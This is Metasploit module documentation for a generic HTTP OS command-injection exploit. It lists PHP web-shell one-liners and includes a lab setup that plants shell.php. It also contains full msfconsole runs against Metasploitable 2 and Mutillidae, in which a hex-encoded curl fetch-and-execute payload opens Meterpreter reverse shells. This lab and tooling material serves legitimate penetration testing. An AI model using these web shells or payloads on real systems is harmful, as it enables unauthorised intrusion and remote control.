documentation/modules/exploit/multi/http/os_cmd_exec.md
This module is for any generic HTTP command execution where user-supplied input is directly passed to system execution functions via a HTTP request. As a result, able to use:
<?php system($_REQUEST["cmd"]); ?><?php passthru($_REQUEST["cmd"]); ?><?php echo exec($_REQUEST["cmd"]); ?><?php echo shell_exec($_REQUEST["cmd"]); ?><?php echo fread(popen($_REQUEST["cmd"], "r"), 2096); ?><?php echo `{$_REQUEST["cmd"]}`; ?>This is similar to exploits/unix/webapp/php_eval, except it isn't limited to PHP’s code execution, but can use any OS command execution function.
Setting up a quick PHP test lab on a Debian-base host:
$ sudo apt-get install --yes apache2 php curl
[...]
$
$ sudo systemctl start apache2
$
$ echo '<?php system($_REQUEST["cmd"]); ?>' | sudo tee /var/www/html/shell.php
<?php system($_REQUEST["cmd"]); ?>
$
$ curl localhost/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
msfconsoleuse exploits/multi/http/os_cmd_execRHOSTS and URIPATH (HEADERS and POSTDATA are optional, depending on vulnerability). May also want to customize the payload and LHOST if desiredrunHEADERSAny additional HTTP headers to send, cookies for example. Format: header:value,header2:value2.
POSTDATAAny HTTP POST method request data to send, with the command injection placeholder set to !INJECT!.
If this value is blank, will be a HTTP GET method request.
ProxiesA proxy chain of format: type:host:port[,type:host:port][...].
Supported proxies: sapni, socks4, socks5, socks5h, http
RHOSTSThe target host(s), see: https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORTThe target port (TCP).
Default: 80
SSLNegotiate SSL/TLS for outgoing connections.
Default: false
URIPATHThe URI to request, with the command injection placeholder set to !INJECT!.
Default: /ping/?cmd=!INJECT!
VHOSTHTTP server virtual host.
msfadmin@metasploitable:~$ echo '<?php system($_REQUEST["cmd"]); ?>' | sudo tee /var/www/shell.php
<?php system($_REQUEST["cmd"]); ?>
msfadmin@metasploitable:~$ curl localhost/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
msfadmin@metasploitable:~$
msf exploit(multi/http/os_cmd_exec) > options
Module options (exploit/multi/http/os_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HEADERS no Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"
POSTDATA no POST data to send, with the eval()'d parameter changed to !INJECT!. Otherwise will be a GET request.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5, http, socks5h, sapni, socks4
RHOSTS 10.0.0.10 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URIPATH /shell.php?cmd=!INJECT! yes The URI to request, with the eval()'d parameter changed to !INJECT!", "/ping/?cmd=!INJECT!
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash,
zsh) (Accepted: none, python3.8+, shell-search, shell)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST tap0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,GET,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME mANdNVqs no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Exploit target:
Id Name
-- ----
0 Linux
View the full module info with the info, or info -d command.
msf exploit(multi/http/os_cmd_exec) > check
[*] Sending GET request: http://10.0.0.10:80/shell.php?cmd=echo%20lKPACzWGh0CD9fjQh2HJAPzO
[+] 10.0.0.10:80 - The target is vulnerable.
msf exploit(multi/http/os_cmd_exec) > run
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Sending GET request: http://10.0.0.10:80/shell.php?cmd=/bin/echo%20-ne%20%27\x63\x75\x72\x6c\x20\x2d\x73\x6f\x20\x2e\x2f\x72\x75\x65\x47\x78\x54\x71\x70\x6f\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x30\x2e\x30\x2e\x30\x2e\x31\x3a\x38\x30\x38\x30\x2f\x77\x34\x66\x47\x56\x67\x58\x69\x4b\x48\x53\x75\x5a\x4a\x31\x64\x6a\x54\x77\x65\x47\x77\x3b\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2e\x2f\x72\x75\x65\x47\x78\x54\x71\x70\x6f\x3b\x2e\x2f\x72\x75\x65\x47\x78\x54\x71\x70\x6f\x26%27%7csh
[*] Sending stage (1062760 bytes) to 10.0.0.10
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:46267) at 2026-03-14 20:35:06 +0000
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : metasploitable.localdomain
OS : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >
This is on Metasploitable 2 VM:
msf > use exploits/multi/http/os_cmd_exec
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/http/os_cmd_exec) > set PAYLOAD cmd/linux/http/x86/meterpreter/reverse_tcp
PAYLOAD => cmd/linux/http/x86/meterpreter/reverse_tcp
msf exploit(multi/http/os_cmd_exec) > set RHOSTS 10.0.0.10
RHOSTS => 10.0.0.10
msf exploit(multi/http/os_cmd_exec) > set LHOST tap0
LHOST => tap0
msf exploit(multi/http/os_cmd_exec) > set URIPATH /mutillidae/index.php?page=dns-lookup.php
URIPATH => /mutillidae/index.php?page=dns-lookup.php
msf exploit(multi/http/os_cmd_exec) > set POSTDATA "target_host=;!INJECT!&dns-lookup-php-submit-button=Lookup+DNS"
POSTDATA => target_host=;!INJECT!&dns-lookup-php-submit-button=Lookup+DNS
msf exploit(multi/http/os_cmd_exec) >
msf exploit(multi/http/os_cmd_exec) > options
Module options (exploit/multi/http/os_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HEADERS no Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"
POSTDATA target_host=;!INJECT!&dns-lookup-php-submit-button=Lookup+DNS no POST data to send, with the eval()'d parameter changed to !INJECT!. Otherwise will be a GET request.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
RHOSTS 10.0.0.10 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URIPATH /mutillidae/index.php?page=dns-lookup.php yes The URI to request, with the eval()'d parameter changed to !INJECT!", "/ping/?cmd=!INJECT!
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash,
zsh) (Accepted: none, python3.8+, shell-search, shell)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST tap0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,GET,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME SYonhqJf no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Exploit target:
Id Name
-- ----
0 Linux
View the full module info with the info, or info -d command.
msf exploit(multi/http/os_cmd_exec) > check
[*] Sending POST request: http://10.0.0.10:80/mutillidae/index.php?page=dns-lookup.php -> target_host=;echo%203uCamYlgMAEsiPoIGU6cWjjQIgzI&dns-lookup-php-submit-button=Lookup+DNS
[+] 10.0.0.10:80 - The target is vulnerable.
msf exploit(multi/http/os_cmd_exec) > run
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Sending POST request: http://10.0.0.10:80/mutillidae/index.php?page=dns-lookup.php -> target_host=;/bin/echo -ne '\x63\x75\x72\x6c\x20\x2d\x73\x6f\x20\x2e\x2f\x7a\x42\x6a\x79\x74\x73\x7a\x6f\x6a\x44\x72\x6c\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x30\x2e\x30\x2e\x30\x2e\x31\x3a\x38\x30\x38\x30\x2f\x77\x34\x66\x47\x56\x67\x58\x69\x4b\x48\x53\x75\x5a\x4a\x31\x64\x6a\x54\x77\x65\x47\x77\x3b\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2e\x2f\x7a\x42\x6a\x79\x74\x73\x7a\x6f\x6a\x44\x72\x6c\x3b\x2e\x2f\x7a\x42\x6a\x79\x74\x73\x7a\x6f\x6a\x44\x72\x6c\x26'|sh&dns-lookup-php-submit-button=Lookup+DNS
[*] Sending stage (1062760 bytes) to 10.0.0.10
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:45260) at 2026-03-14 07:32:49 +0000
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : metasploitable.localdomain
OS : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >